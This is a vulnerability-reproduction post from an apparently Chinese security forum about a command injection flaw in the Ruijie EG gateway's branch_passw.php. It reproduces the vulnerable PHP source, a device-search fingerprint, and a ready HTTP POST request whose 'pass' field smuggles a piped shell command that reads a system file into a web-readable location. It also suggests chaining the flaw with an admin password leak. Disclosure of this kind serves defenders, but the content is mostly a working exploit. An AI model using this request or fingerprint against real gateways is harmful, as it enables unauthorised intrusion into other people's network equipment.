问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Ruijie EG易网关 branch_passw.php 远程命令执行
# Ruijie EG易网关 branch_passw.php 远程命令执行 ## 漏洞描述 RuijieEG易网关 branch_passw.php存在命令执行漏洞,配合 RuijieEG易网关 管理员账号密码泄露漏洞 达到RCE控制服务器 #...
Ruijie EG易网关 branch\_passw.php 远程命令执行 ===================================== 漏洞描述 ---- RuijieEG易网关 branch\_passw.php存在命令执行漏洞,配合 RuijieEG易网关 管理员账号密码泄露漏洞 达到RCE控制服务器 漏洞影响 ---- RuijieEG易网关 网络测绘 ---- app="Ruijie-EG易网关" 漏洞复现 ---- 首先登录到后台中(可以组合 RuijieEG易网关 管理员账号密码泄露漏洞) 漏洞文件 branch\_passw.php ```php <?php /** * 分支密码的统一管理 */ define('IN', true); //定位该文件是入口文件 define('DS', DIRECTORY_SEPARATOR); //定义系统目录分隔符 define('AROOT', dirname(__FILE__) . DS); //定义入口所在的目录 include_once(dirname(dirname(__FILE__)) . DS . 'mvc' . DS . 'controller' . DS . 'core.controller.php'); class defaultController extends coreController { private $filename; private $cli = "evpn-server config all-clients file \"/data/evpn/cfg_pwd.text\""; function __construct() { parent::__construct(); $this->filename = DS . "data" . DS . "evpn" . DS . "cfg_pwd.text"; } /** * 设置分支设备的密码 * @param string post(pass) 分支密码 */ public function setAction() { $pass = p("pass"); if ($pass == FALSE) { json_echo(false); return; } $command = "/usr/local/evpn/server/cfg_pass.sh config " . $pass; evpnShell($command); } /** * 关闭集中控制功能 */ function closeAction(){ evpnShell("/usr/local/evpn/server/cfg_pass.sh disable"); } /** * 获取分支密码 */ function getAction() { $command = "/usr/local/evpn/server/echo_pass.sh"; $content = []; exec(EscapeShellCmd($command), $content); $data = array("status" => true, "data" => isset($content[0]) && $content[0] === "" ? "" : $content); json_echo($data); } /** * 获取分支密码设置列表 */ function listAction(){ $province = p("province"); $city = p("city"); $district = p("district"); $shell = "/usr/local/evpn/server/sh_clients_pass.sh"; if($province !== FALSE && $province != ""){ $shell .= " province ".iconv("UTF-8", "GB2312//IGNORE", $province); } if($city !== FALSE && $city != ""){ $shell .= " city ".iconv("UTF-8", "GB2312//IGNORE", $city); } if($district !== FALSE && $district != ""){ $shell .= " district ".iconv("UTF-8", "GB2312//IGNORE", $district); } header("Content-type: text/html;charset=gbk"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); echo `$shell`; } } include_once dirname(dirname(__FILE__)) . '/init.php'; //mvc架构初始化 ``` 其中漏洞部分 ```php /** * 设置分支设备的密码 * @param string post(pass) 分支密码 */ public function setAction() { $pass = p("pass"); if ($pass == FALSE) { json_echo(false); return; } $command = "/usr/local/evpn/server/cfg_pass.sh config " . $pass; evpnShell($command); } ``` `&pass`变量可控并且无过滤执行命令使用 `|` 即可绕过 发送请求包 ```plain POST /itbox_pi/branch_passw.php?a=set HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 41 Content-Type: application/x-www-form-urlencoded Cookie: RUIJIEID=52222egp72ilkpf2de7qbrigk3;user=admin; X-Requested-With: XMLHttpRequest Accept-Encoding: gzip pass=|cat /etc/psswd>../test_test.txt ``` 再访问 ```plain http://xxx.xxx.xxx.xxx/test_test.txt ``` ![img](https://shs3.b.qianxin.com/butian_public/f17671846622e6628ae36cd1259a3e25e67bfb0fdb3b3.jpg)
发表于 2024-07-12 18:49:46
阅读 ( 1009 )
分类:
网络设备
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!